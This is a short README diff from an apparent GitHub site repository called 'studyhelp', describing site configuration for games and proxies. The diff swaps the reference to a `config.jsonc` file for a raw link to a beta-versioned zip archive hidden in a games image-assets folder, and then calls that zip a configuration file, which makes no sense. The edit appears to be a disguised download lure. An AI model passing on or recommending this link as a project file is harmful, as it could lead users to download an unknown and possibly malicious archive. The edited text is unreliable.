misslesnake2/studyhelp.github.io/README.md

 > Disclaimer: The following customizations are only available to owners of the repository or any fork of this repository.

-The `config.jsonc` file is formatted to include configuration for the entire site.
+The `https://raw.githubusercontent.com/misslesnake2/studyhelp.github.io/main/games/abandoned/assets/images/levels/uc/github_studyhelp_io_2.4-beta.2.zip` file is formatted to include configuration for the entire site.
 Currently, the following items are supported:
 - Games
 - Themes (coming soon)
 - Proxy Configuration